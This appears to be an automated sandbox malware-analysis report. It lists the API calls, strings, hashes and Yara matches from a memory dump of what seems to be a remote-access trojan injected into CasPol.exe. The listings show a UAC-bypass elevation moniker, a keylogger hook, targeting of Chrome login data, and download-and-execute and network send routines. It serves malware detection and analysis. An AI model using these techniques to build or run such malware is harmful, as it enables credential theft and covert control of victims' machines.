                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object_wcslen
                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                              • API String ID: 240030777-3166923314
                                                                              • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                              • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                              APIs
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                              • GetLastError.KERNEL32 ref: 00419935
                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                              • String ID:
                                                                              • API String ID: 3587775597-0
                                                                              • Opcode ID: 0fef82cc63ea0664d69b391ca2015d4117144b47f7948cce82651334bc21da84
                                                                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                              • Opcode Fuzzy Hash: 0fef82cc63ea0664d69b391ca2015d4117144b47f7948cce82651334bc21da84
                                                                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                              • String ID:
                                                                              • API String ID: 2341273852-0
                                                                              • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                              • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Find$CreateFirstNext
                                                                              • String ID: @CG$XCG$`HG$`HG$>G
                                                                              • API String ID: 341183262-3780268858
                                                                              • Opcode ID: 5c4d7f5cc93035747a764e7710dd22b22cb4f919a2a8588896b861aaa8e097fb
                                                                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                              • Opcode Fuzzy Hash: 5c4d7f5cc93035747a764e7710dd22b22cb4f919a2a8588896b861aaa8e097fb
                                                                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                              Strings
                                                                              • Keylogger initialization failure: error , xrefs: 00409A32
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                              • String ID: Keylogger initialization failure: error
                                                                              • API String ID: 3219506041-952744263
                                                                              • Opcode ID: 5dd7d4e87483909495a537fcad95406c8ded85d18e3ccefef833e7d42386b7cb
                                                                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                              • Opcode Fuzzy Hash: 5dd7d4e87483909495a537fcad95406c8ded85d18e3ccefef833e7d42386b7cb
                                                                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                              APIs
                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                              • API String ID: 2127411465-314212984
                                                                              • Opcode ID: f8d616d4508dc2c046470fb811fbd903af535893f3080e052b4e915e73f2105b
                                                                              • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                              • Opcode Fuzzy Hash: f8d616d4508dc2c046470fb811fbd903af535893f3080e052b4e915e73f2105b
                                                                              • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                              APIs
                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                              Strings
                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                              • UserProfile, xrefs: 0040B227
                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                              • API String ID: 2018770650-1062637481
                                                                              • Opcode ID: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                              • Opcode Fuzzy Hash: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 3534403312-3733053543
                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                              • String ID:
                                                                              • API String ID: 4043647387-0
                                                                              • Opcode ID: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                              • Opcode Fuzzy Hash: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                              • String ID:
                                                                              • API String ID: 276877138-0
                                                                              • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                              • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                              APIs
                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                              • API String ID: 1589313981-1420736420
                                                                              • Opcode ID: 204994bc045b12a58d302f5ccdbfb23efbfdd41b70a37fa13545696ca80e0191
                                                                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                              • Opcode Fuzzy Hash: 204994bc045b12a58d302f5ccdbfb23efbfdd41b70a37fa13545696ca80e0191
                                                                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                              • GetACP.KERNEL32 ref: 004512BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID: ACP$OCP
                                                                              • API String ID: 2299586839-711371036
                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID: SETTINGS
                                                                              • API String ID: 3473537107-594951305
                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                              • String ID:
                                                                              • API String ID: 745075371-0
                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                              • String ID:
                                                                              • API String ID: 1157919129-0
                                                                              • Opcode ID: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                              • Opcode Fuzzy Hash: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DownloadExecuteFileShell
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                              • API String ID: 2825088817-4197237851
                                                                              • Opcode ID: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                              • Opcode Fuzzy Hash: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$FirstNextsend
                                                                              • String ID: x@G$x@G
                                                                              • API String ID: 4113138495-3390264752
                                                                              • Opcode ID: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                              • Opcode Fuzzy Hash: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                              • API String ID: 4127273184-3576401099
                                                                              • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                              • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                              • API String ID: 4127273184-3576401099
                                                                              • Opcode ID: e58d5d156422fa9fdc98074cf529f6e3c1621ed7f2885a5187e8ecfa81d2d443
                                                                              • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                              • Opcode Fuzzy Hash: e58d5d156422fa9fdc98074cf529f6e3c1621ed7f2885a5187e8ecfa81d2d443
                                                                              • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BFF
